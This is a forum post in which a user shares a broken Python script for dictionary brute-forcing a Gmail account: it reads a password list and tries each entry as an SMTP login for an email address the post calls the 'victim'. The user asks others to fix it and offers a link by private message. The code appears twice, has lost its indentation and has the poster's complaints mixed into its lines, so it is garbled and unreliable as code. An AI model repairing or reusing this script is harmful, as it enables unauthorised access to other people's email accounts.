07-17-2015, 07:14 PM
#!/usr/bin
import smtplib
file_name=raw_input("Enter name of your dictionary: ")
username=raw_input("Enter email id of victim: ")
f=open(file_name,"r")
for name in f:
try:
session = smtplib.SMTP('smtp.gmail.com',587) EVERYTHING WASGOING SMOOTH UNTILL I GOT HERE>>>>>>>>>>>>
session.starttls() <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
session.ehlo
b = session.login(username,name[:-1])
except smtplib.SMTPAuthenticationError:
continue
else: Would anybody have a fix for this?
import smtplib
file_name=raw_input("Enter name of your dictionary: ")
username=raw_input("Enter email id of victim: ")
f=open(file_name,"r")
for name in f:
try:
session = smtplib.SMTP('smtp.gmail.com',587) EVERYTHING WASGOING SMOOTH UNTILL I GOT HERE>>>>>>>>>>>>
session.starttls() <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
session.ehlo
b = session.login(username,name[:-1])
except smtplib.SMTPAuthenticationError:
continue
else: Would anybody have a fix for this?







pm for link!





